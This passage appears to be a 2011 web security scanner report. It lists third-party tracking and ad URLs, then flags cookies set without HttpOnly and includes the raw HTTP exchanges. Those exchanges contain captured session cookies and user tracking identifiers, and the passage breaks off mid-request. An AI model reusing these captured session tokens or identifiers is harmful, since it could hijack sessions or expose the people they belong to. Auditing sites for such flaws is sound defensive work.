http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dcf192e3cde61c254f6c88534da58802b5398ea24b9efa9ba685dfd72bea4fa8190c69ae5ede6f0721ccb34e717c6107bcfaf2cfe44f88fec42e36ffe9116f59a6f918a80dd8e17e504876f2e69c508c691b6d9281fff0acd3e99db7f9b07ac79b36cd607e06da5e9c4458d76d0eeac1f394a802d460f590fe6ea7f666d23dccd20abac2d92880ff34a405027857b7f2db653389d23a43638d06e3f765a2d8d598f1062f8fcd643983437aeac41c62611881d352de9d97c32cf54f777d612b929d8913b5bc8b0379af246e1bba7d1821ce8b1b8db8d166b7f52081b0a29d9119cb9a4f447873339c33193f96e2f108ab154593263be7f6518d1944fa3b1b1cec003d123452e5333cec0b0f3c0ae168e5d0e9db1a53bf3e808baf3f24e64c14c3f2b1e02cee7dfd5cb0cdcc45ad329b17c70e526b36a57e0b3bf603170be9a33aafff9eca4a1237a8ffe472485706d9f6c895e32c048508fbc64699631b195653c891687399cd539d3d95b6bf7900cb355e8251411b31212492b4091796c5e2d549c235a07490aa42afdae8548a987faccef67a1445162cd38c7499b47ab78ad924ef99525bd815e63ce7e885fe39ca6822ceb3602d0059b0a8f279e80766642b31203aa6d6ee97b9139867ee1aa7ba3f02f41253bf90b753118e080e6a038d7c0b2be2dc588716e7c6fc4e44d4d21802c75c1e8806abefaa114127472ef49590b2b5d5d52a87d622d582fb317c59bf26d4866e09d8a6c7a747582d807bb41131bf80bb4a8a24de4bc3ee7f8eef25e09fc0178bbc46a0a277ef134dbcf1ca97ea6ca96afc78a753694fe0857a6a3e32243f4ef6cc09f2332399d9d6b530b1b82b7bd324435314e635aa5253c38beeb1db2ad850da9fc12d1499010dbb2637e44e058368dcd0c776032f802db4acabefd54c5dee0ba16f60e6a6b2c1ace90fa07cc47b900c5174eceb36fd04d48af115d89be05c6c3e551e620b3a5ade8a9ad503d1f87ea9eae460023c247a3bd2c7432c3944c4d2fe440c587c86375db1c89060973f59d04e9789b6e43a04d4773063e59072ff7d9b9e033c5eb1ba6c5622ab57a7359c1c627019c9cdb4253bf4d2c877529f44ffe96a4e6079d1755855503fb07d4e2f4b2ff8b6dfd9c2bf3df203913969704acae50f9dabbce015db5f187ccaf1e838551259e3d016f9d10ca3f62e1ac73921d7d7f7668c16055fbd964d70510d824bc6a4fc13ede16c8529b3519e560528905a6c698a589515bca2c3dd41390cd58e004bfcb88af5a73e26245b6d033bd9b438c391c763b212a7a30ea79b75490603bcd1af2342fb0e53c16725ac86b99104b7858efe72acb55e7faa22a53e4b676f15b9f3c5097bfaedfeae70071cde9d9213790950c684e4e03df0e2a17e4551cfde0e5517f19b1fc0e374c6183a508779a0763e68b8d5b62c6855cd1e9ce1ab1f80919279c7f38496119233d88d1a3dbc24e85d3d838d5783d2566d68a0051f463b6f4bfdd3331d06c8b6a5d51c76f15a5d21443dbd0c6670c7bdaa3be0a104bbf57876dba9c5c928ddf236591ef12aa7c129be5265b8cd9ca3383564f530c9dc873419440ef867fa5712fc8cd9d589f6acaa54857770a79f59f4618f43dadef23cadec93964ed4b1e92d4a0d2076ce9ef36df78c97dfc78977bd6191d8ced1c3fb5760e1e47e4a45c795f13d92fda6a31a2c06cbc8a0c8e2a660ebbf5d623b135ad8ab210b8c645d4f6137873627d59f7fba294317baec039dc250131ca3fbe973a9a77984547c4816041b9c62
http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dcf192e3cde61c254f6c88534da58802b5398ea24b9efa9ba685dfd72bea4fa8190c69ae5ede6f0721ccb34e717c6107bcfaf2cfe44f88fec42e36ffe9116f59a6f918a80dd8e17e504876f2e69c508c691b6d9281fff0acd3e99db7f9b07ac79b36cd607e06da5e9c4458d76d0eeac1f394a802d460f590fe6ea7f666d23dccd20abac2d92880ff34a405027857b7f2db653389d23a43638d06e3f765a2d8d598f1062f8fcd643983437aeac41c62611881d352de9d97c32cf54f777d612b929d8913b5bc8b0379af246e1bba7d1821ce8b1b8db8d166b7f52081b0a29d9119cb9a4f447873339c33193f96e2f108ab154593263be7f6518d1944fa3b1b1cec003d123452e5333cec0b0f3c0ae168e5d0e9db1a53bf3e808baf3f24e64c14c3f2b1e02cee7dfd5cb0cdcc45ad329b17c70e526b36a57e0b3bf603170be9a33aafff9eca4a1237a8ffe472485706d9f6c895e32c048508fbc64699631b195653c891687399cd539d3d95b6bf7900cb355e8251411b31212492b4091796c5e2d549c235a07490aa42afdae8548a987faccef67a1445162cd38c7499b47ab78ad924ef99525bd815e63ce7e885fe39ca6822ceb3602d0059b0a8f279e80766642b31203aa6d6ee97b9139867ee1aa7ba3f02f41253bf90b753118e080e6a038d7c0b2be2dc588716e7c6fc4e44d4d21802c75c1e8806abefaa114127472ef49590b2b5d5d52a87d622d582fb317c59bf26d4866e09d8a6c7a747582d807bb41131bf80bb4a8a24de4bc3ee7f8eef25e09fc0178bbc46a0a277ef134dbcf1ca97ea6ca96afc78a753694fe0857a6a3e32243f4ef6cc09f2332399d9d6b530b1b82b7bd324435314e635aa5253c38beeb1db2ad850da9fc12d1499010dbb2637e44e058368dcd0c776032f802db4acabefd54c5dee0ba16f60e6a6b2c1ace90fa07cc47b900c5174eceb36fd04d48af115d89be05c6c3e551e620b3a5ade8a9ad503d1f87ea9eae460023c247a3bd2c7432c3944c4d2fe440c587c86375db1c89060973f59d04e9789b6e43a04d4773063e59072ff7d9b9e033c5eb1ba6c5622ab57a7359c1c627019c9cdb4253bf4d2c877529f44ffe96a4e6079d1755855503fb07d4e2f4b2ff8b6dfd9c2bf3df203913969704acae50f9dabbce015db5f187ccaf1e838551259e3d016f9d10ca3f62e1ac73921d7d7f7668c16055fbd964d70510d824bc6a4fc13ede16c8529b3519e560528905a6c698a589515bca2c3dd41390cd58e004bfcb88af5a73e26245b6d033bd9b438c391c763b212a7a30ea79b75490603bcd1af2342fb0e53c16725ac86b99104b7858efe72acb55e7faa22a53e4b676f15b9f3c5097bfaedfeae70071cde9d9213790950c684e4e03df0e2a17e4551cfde0e5517f19b1fc0e374c6183a508779a0763e68b8d5b62c6855cd1e9ce1ab1f80919279c7f38496119233d88d1a3dbc24e85d3d838d5783d2566d68a0051f463b6f4bfdd3331d06c8b6a5d51c76f15a5d21443dbd0c6670c7bdaa3be0a104bbf57876dba9c5c928ddf236591ef12aa7c129be5265b8cd9ca3383564f530c9dc8734195e13e473e5477f80fae3f4f889c7a853856a70bf995a8208e85de0f4cf1d9dccbaa929d2fcbc646e010a6083c1be46d0eb909292c053b14b8795919ce8dc3067b1bb3d7345cb89da2f89fef0a17b13309a9ef385b98035afeb4a79786d398dba2f4f8e65081d313780362dd1cd7eef7b4646eaea4084d0667e77d299cb65a1b72184547c481603bc57d1
http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41ace38de70fd1d0bd08fcf372b5762404eb44e72200079ef5c91708f9a5ae736596cbdf675b99a2f886bec6a144744639c5121396c44ffe2bc2b3439debd6b39cdecc3ab105a609097cf452c6200f2be9be4377667b13ccbae2cdfa43a8e3997766bbae273b5ab1ff469a5692a672421334b1f3ba5183650623829decb693d6b682e0afe92d849a36d77c696f9b02f52213c7753c022c538b
http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41ace38de70fd1d0bd08fcf372b5762404eb44e72200079ef5c91708f9a5ae736596cbdf675b99a2f886bec6a144744639c5121396c44ffe2bc2b3439debd6b39cdecc3ab105a609097cf452c6200f2be9be4377667b13ccbae2cdfa43a8e3997766bbae273b5ab1ff469a5692a672421334b1f3ba5183650623829decb693d6b782e0af9f4bfcef26c36e0336dd479c6658e55070b5e4b7bde575cc77e590f867a08763d726c3f654ef95915adab36bfc3316044cd6a98a351cdbc765154dd94cf8f96bd3f0e1a3d64c41d4f8322d882278fbdb09384558fc8f7582dc8dbd36862f1a683879d69ad104caddc45b33a22e2e65f1675c77ef961b91a2d167b7f57993dfcd8fec5580d8231a393458d620142e94f6f269a51b2aa34877aff62cfa6133e8200a75b3497c79770b83465fb0385d11479666fda58cb46d32ac54e7e9a04334e25d15d5a9f7a264df2eda17fe91dc4ecc20e963d77951256af5214019cd6f611bf6b23eb9fb9dbd561721adf984763f4077d2bc84b0af0863f60defc331fd636c7927438ad26c6eccb308df66a0d1ff243efc1c698559510e214e23fff01516a58fa093338256ef38c5ea138596a112dcf552fbdefe2c4c1b436894db29d0a47cb09fd3488ccf12068f54fd24f588e29247b90d39b9d40132105bfee5a360f21b757e3a35367cfcc6f186dd15e972e41ee4e67941aa4e0eaa87b73507fd1f492b52d1234a3ce2cb4ff772f0c6bd0b16908f0b05cc4d1dfe10af9dba1043711677a48995b7a7d4a23a82dd4ea3fc9b260d4ea826e1c6325fc2a6c2e650583a9609804e70e8a5f716dd338e0bf6ae34cfbe7ebfdf8022cfe474f0fe21af4665e3a79e8ae91db569886db8420c19b2b30c2c1c63732f18b5ed18ef28279ec4ddb637afa8431bc274021742b572a14459d6f4b2e6ab6bfe07ca81960925b4263fcc363fe34c668a7883928025527d972ea2aea9ee854450bf5dbb737684cdd0bfdff903b77bdf72807f567c8d872286509dc6c75890d0b6496e3c401d1b0c2d45ab809ad65f96ba39fdb3a07f033a3b7a4a8bc0316967129582a418440a76875c4ab6bd836c845d108009fecceeb27304b13a1272ce9369ce22c1ae722745a9ae1e0d72ed09f77e9d7b1d1778919ed76173b2b2d76d12d473afb223296c6aa0782f732a41e55e5f21455ac780dfbfdaa74baa54913b096350a2a2538da9bce11ccd5c0770d0f1e32750022f9fa403efc055eaa17044cf2b5dc5c9e13fd24a4120d6805860500f835dc7a2f217ebee6d8f3fc044f00e1603fa4f3555e30ff220bbc4a3ac566017df870717fbc4f692a62b5f5b2f12782aa5ca41a897a702d618dfd102d095794e620edbafe46c12f90e58c93131cda5f4d64fbda184b517cada3714df33af2a363f3856e5b59a5c3b8b99bdfc722c40d2c3b52d6e5c14daf9868257d58bda654d169283155b199ebb7094b7239f0f6613d37ba427343eb1d3b62c6f04c10e99b3e8129391e77c83be93f727fa5ff3a245056473e3
http://pixel.everesttech.net/2368/gr
http://pixel1350.everesttech.net/1350/p
http://t.mookie1.com/t/v1/imp
http://wow.curse.com/user/NetworkCookie/ajaxSession.aspx
http://www.pages05.net/WTS/event.jpeg
http://www.seashepherd.org/
http://www.seashepherd.org/news-and-media/2011/07/19/emergency-sos-from-captain-paul-watson-save-our-ship-1263
http://www.silverpop.com/preferences_sf/prepopulateFields.js.sp
http://204.124.80.52/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif
http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911
http://a.netmng.com/hic/
http://a.tribalfusion.com/j.ad
http://a1.interclick.com/ColDta.aspx
http://a1.interclick.com/getInPageJSProcess.aspx
http://ad.turn.com/server/ads.js
http://ad.turn.com/server/pixel.htm
http://ad.yieldmanager.com/pixel
http://ad.yieldmanager.com/unpixel
http://ads.adap.tv/beacons
http://ads.adap.tv/cookie
http://ads.pointroll.com/PortalServe/
http://ads.undertone.com/f
http://adserver.adtechus.com/addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH
http://ak1.abmr.net/is/a.collective-media.net
http://ak1.abmr.net/is/showadsak.pubmatic.com
http://amch.questionmarket.com/adsc/d922005/24/42823090/decide.php
http://amch.questionmarket.com/adsc/d922005/24/42823584/decide.php
http://amch.questionmarket.com/adsc/d922005/24/42823586/decide.php
http://amch.questionmarket.com/adsc/d922005/24/42825515/decide.php
http://amch.questionmarket.com/adsc/d922005/24/42825637/decide.php
http://ap.lijit.com/www/delivery/retarget.php
http://api.bizographics.com/v1/profile.json
http://api.bizographics.com/v1/profile.redirect
http://apr.lijit.com///www/delivery/ajs.php
http://ar.atwola.com/atd
http://ar.voicefive.com/bmx3/broker.pli
http://articleonepartners.app7.hubspot.com/salog.js.aspx
http://at.amgdgt.com/ads/
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/p
http://b.scorecardresearch.com/r
http://b.voicefive.com/b
http://bcp.crwdcntrl.net/4/c=520%7Crand=110304385%7Cpv=y%7Crt=ifr
http://bh.contextweb.com/bh/getuid
http://bostonglobe.tt.omtrdc.net/m2/bostonglobe/mbox/standard
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://c.atdmt.com/c.gif
http://c.bing.com/c.gif
http://c.live.com/c.gif
http://ce.lijit.com/merge
http://cf.addthis.com/red/p.json
http://clients.mobilecause.com/lists/1227/subscriptions/web.js
http://clk.atdmt.com/goiframe/222276744/331989646/direct
http://clk.atdmt.com/goiframe/223672189/334126009/direct
http://cms.quantserve.com/dpixel
http://code.msdn.microsoft.com/
http://code.msdn.microsoft.com/globalresources/scripts/ms2.js
http://code.msdn.microsoft.com/site/upload
http://community.spiceworks.com/r/595
http://content.mkt51.net/lp/static/js/iMAWebCookie.js
http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer
http://cspix.media6degrees.com/orbserv/hbpix
http://d.101m3.com/afr.php
http://d.101m3.com/lg.php
http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4146544210108361256/mchpid/3/url/
http://forums.vostu.com/
http://forums.vostu.com/forums/41-Como-Jogar
http://greatpondsma.org/
http://home.live.com/search
http://home.live.com/search/
http://home.live.com/search/hip
http://i.w55c.net/ping_match.gif
http://idcs.interclick.com/Segment.aspx
http://image2.pubmatic.com/AdServer/Pug
http://image2.pubmatic.com/AdServer/Pug
http://image2.pubmatic.com/AdServer/Pug
http://images.apple.com/global/metrics/js/s_code_h.js
http://images.apple.com/global/nav/scripts/globalnav.js
http://images.apple.com/global/nav/styles/navigation.css
http://images.apple.com/global/scripts/apple_core.js
http://images.apple.com/global/scripts/browserdetect.js
http://images.apple.com/global/scripts/content_swap.js
http://images.apple.com/global/scripts/lib/event_mixins.js
http://images.apple.com/global/scripts/lib/prototype.js
http://images.apple.com/global/scripts/lib/scriptaculous.js
http://images.apple.com/global/scripts/overlay_panel.js
http://images.apple.com/global/scripts/promomanager.js
http://images.apple.com/global/scripts/search_decorator.js
http://images.apple.com/global/scripts/swap_view.js
http://images.apple.com/global/scripts/view_master_tracker.js
http://images.apple.com/global/styles/base.css
http://images.apple.com/macpro/scripts/pagenav.js
http://images.apple.com/macpro/scripts/performance.js
http://images.apple.com/metrics/scripts/s_code_h.js
http://images.apple.com/support/css/base_new.css
http://images.apple.com/support/css/global/nav/navigation.css
http://images.apple.com/support/css/suggest2.css
http://images.apple.com/support/css/support.css
http://images.apple.com/support/home/css/home2011.css
http://images.apple.com/support/iknow/scripts/ACQuicklinks2.js
http://images.apple.com/support/iknow/scripts/ACShortcuts.js
http://images.apple.com/support/scripts/AppleCareWeb/Modules/ExpressLane.js
http://images.apple.com/support/scripts/SCReporting.js
http://images.apple.com/support/scripts/module_decorator.js
http://images.apple.com/support/scripts/new_country.js
http://images.apple.com/support/scripts/new_support_coverage/cookies.js
http://images.apple.com/support/scripts/new_support_coverage/en_strings.js
http://images.apple.com/support/scripts/new_support_coverage/functions.js
http://images.apple.com/support/scripts/psp_geos.js
http://images.apple.com/support/scripts/support.global.js
http://images.apple.com/support/scripts/warranty_check/warrantykeys.js
http://images.apple.com/support/scripts/warranty_check/warrantypsp.js
http://js.revsci.net/gateway/gw.js
http://leadback.advertising.com/adcedge/lb
http://legolas.nexac.com/lgalt
http://lifescript.us.intellitxt.com/intellitxt/front.asp
http://lm.trafficmp.com/clicksense/epic
http://load.exelator.com/load/
http://m.webtrends.com/dcsjwb9vb00000c932fd0rjc7_5p3t%20/dcs.gif
http://m.webtrends.com/dcsjwb9vb00000c932fd0rjc7_5p3t/dcs.gif
http://m.webtrends.com/dcsmgru7m99k7mqmgrhudo0k8_8c6m/dcs.gif
http://m.webtrends.com/dcso6p7z7100004j151amwxpo_5q2j/dcs.gif
http://media.fastclick.net/w/get.media
http://media.trafficmp.com/a/js
http://media.trafficmp.com/a/js
http://msdn.microsoft.com/magazine/ee336135.aspx
http://mssto.112.2o7.net/b/ss/msstoerrors/1/H.20.2--NS/0
http://odb.outbrain.com/utils/get
https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx
http://p.brilig.com/contact/bct
http://pix04.revsci.net/A11149/a4/0/0/123.302
http://pix04.revsci.net/D08734/a1/0/3/0.js
http://pix04.revsci.net/G07608/a4/0/0/pcx.js
http://pix04.revsci.net/J08778/b3/0/3/1008211/347187000.js
http://pix04.revsci.net/J08778/b3/0/3/1008211/435975349.js
http://pix04.revsci.net/J08778/b3/0/3/1008211/674742100.js
http://pixel.33across.com/ps/
http://pixel.quantserve.com/pixel
http://pixel.quantserve.com/pixel/p-c9d_b-0iR8pjg.gif
http://poweredby.kosmix.com/external/ads/kinsert/kosmixCL.js
http://profile.live.com/Handlers/Plt.mvc
http://profile.live.com/favicon.ico
http://r.openx.net/set
http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8y/rnd/772053252
http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/
http://rd.apmebf.com/w/get.media
http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/lifestyle/default/L32/1921254557/RIGHT1/boston/m_smiletrain070611_ros_SKY/160x600_rosx_071211-smiletrain.html/72634857383034474942344141544233
http://rs.gwallet.com/r1/pixel/x960r=772053252
http://rt.legolas-media.com/lgrt
http://sales.liveperson.net/hc/54909046/
http://sales.liveperson.net/hc/54909046/
http://segment-pixel.invitemedia.com/pixel
http://segment-pixel.invitemedia.com/set_partner_uid
http://segments.adap.tv/data
http://segments.adap.tv/data/
http://showadsak.pubmatic.com/AdServer/AdServerServlet
http://sitelife.boston.com/ver1.0/Direct/Jsonp
http://sm6.sitemeter.com/js/counter.asp
http://social.msdn.microsoft.com/Search/en-US
http://social.msdn.microsoft.com/search/en-US/en-USebb6e
http://sourceforge.net/projects/hoytllc-vcloud/
http://sync.adap.tv/sync
http://sync.mathtag.com/sync/img
http://t4.trackalyzer.com/trackalyze.asp
http://tags.bluekai.com/ids
http://tags.bluekai.com/site/2731
http://tags.bluekai.com/site/2751
http://tags.bluekai.com/site/365
http://trk.etrigue.com/track.php
http://uat.netmng.com/pixel/
http://user.lucidmedia.com/clicksense/user
http://user.lucidmedia.com/clicksense/user/browser
http://vap2den1.lijit.com/www/delivery/lg.php
http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/
http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/description
http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/stats/RegisterPageView
http://visualstudiogallery.msdn.microsoft.com/globalresources/scripts/ms2.js
http://visualstudiogallery.msdn.microsoft.com/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula
http://visualstudiogallery.msdn.microsoft.com/site/favorites
http://visualstudiogallery.msdn.microsoft.com/site/search
http://web2.checkm8.com/adam/detect
http://web2.checkm8.com/adam/em/ad_play/442707/cat=47183/uhook=6DF1BDD4075B/criterias=32_0_43_3_103_18_104_12_116_225_117_225045_118_1_120_4000000100_122_4225045100_280_22_282_0_283_0_/ord=8851318688487949
http://wow.curse.com/Themes/Common/v6/images/loading.gif
http://wow.curse.com/Themes/Common/v6/images/wow/bkg-box-label.png
http://wow.curse.com/Themes/Common/v6/styles/portals/wow.css
http://wow.curse.com/Themes/Curse-Wow/Styles/theme.css
http://wow.curse.com/Themes/Curse-Wow/Styles/theme.css.aspx
http://wow.curse.com/WebResource.axd
http://wow.curse.com/adserver/default.aspx
http://wow.curse.com/themes/common/v6/styles/browser/ie7.css
http://www.bing.com/fd/ls/l
http://www.bing.com/search
http://www.burstnet.com/enlightn/8117//3E06/
http://www.burstnet.com/enlightn/8171//99D2/
http://www.capitalone.com/autoloans/before-you-apply.php
http://www.capitalone.com/autoloans/redirect.php
http://www.capitalone.com/directbanking/
http://www.capitalone.com/directbanking/online-savings-accounts/interestplus-online-savings-account/open-account/
http://www.capitalone.com/redirect.php
http://www.capitalone.com/stylesheets/https-common/header.css
http://www.kosmix.com/flash/kxcd2.swf
http://www.observer.com/
http://www.othersonline.com/partner/scripts/myyearbook/alice.js
http://www.othersonline.com/partner/scripts/myyearbook/page_parser.js
http://www.righthealth.com/contextlinks/lifescript.com/cl.js
http://www.righthealth.com/external/ads/clo.gif
http://www.silverlight.net/getting-started
http://www.socialirl.com/storage/Social-IRL-Logofor-Squares.gif
http://www.uscg.mil/global/img/primary_uscg.jpg
http://www.walmartlabs.com/
http://www.wtp101.com/pull_sync

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

11.1. http://ads.adxpose.com/ads/ads.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ads.adxpose.com
Path:	/ads/ads.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=C5FF405D2EDF636507BA3681C4D12685; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/ads.js?uid=amRZRPmRXMjwy5CP_10671987 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220?t=1311428802392&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=6805757a-ba62-4ca3-815c-dec40d38f03a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C5FF405D2EDF636507BA3681C4D12685; Path=/
ETag: "20718-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 23 Jul 2011 13:48:44 GMT
Connection: close
Content-Length: 11382

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...

11.2. http://c.microsoft.com/trans_pixel.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://c.microsoft.com
Path:	/trans_pixel.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=a249f876-00b8-4c5d-9c21-de037b2ac7b6&Microsoft.CreationDate=07/21/2011 17:35:34&Microsoft.LastVisitDate=07/21/2011 17:35:35&Microsoft.NumberOfVisits=2&SessionCookie.Id=8398488F0DFE43145C0E05E22527CE9C; domain=microsoft.com; expires=Thu, 21-Jul-2011 18:05:35 GMT; path=/
MSID=Microsoft.CreationDate=07/20/2011 18:28:20&Microsoft.LastVisitDate=07/21/2011 17:35:35&Microsoft.VisitStartDate=07/21/2011 17:35:34&Microsoft.CookieId=83f3d6dd-9e1a-4fc0-be7f-977f10276d9f&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=19&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0710-6455-2061-8144; domain=microsoft.com; expires=Fri, 20-Jul-2012 17:35:35 GMT; path=/
MS0=218903b4e52846208d2f3155cff8d220; domain=.microsoft.com; expires=Thu, 21-Jul-2011 18:05:35 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.3. http://dg.specificclick.net/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://dg.specificclick.net
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=73c7c3ef40687248275fd191c941; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?y=3&t=h&u=http%3A%2F%2Fwww.treehugger.com%2Fscience_technology%2F%3Fcampaign%3Dth_nav_scitech&r=http%3A%2F%2Fwww.treehugger.com%2Ftravel_nature%2F%3Fcampaign%3Dth_nav_travel HTTP/1.1
Host: dg.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/science_technology/?campaign=th_nav_scitech
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=726c499ac4c35958e63a57384b0a

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=73c7c3ef40687248275fd191c941; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sat, 23 Jul 2011 13:43:26 GMT
Vary: Accept-Encoding
Content-Length: 569
Connection: Keep-Alive

<html><body> <script> var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = docume
...[SNIP]...

11.4. http://event.adxpose.com/event.flow previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://event.adxpose.com
Path:	/event.flow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=52553368C42DAFBB851AEBDA5EF760BB; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&uid=amRZRPmRXMjwy5CP_10671987&xy=0%2C0&wh=728%2C90&vchannel=610&cid=acerno&iad=1311428805773-56517315376549960&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=32&flash=10.3&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
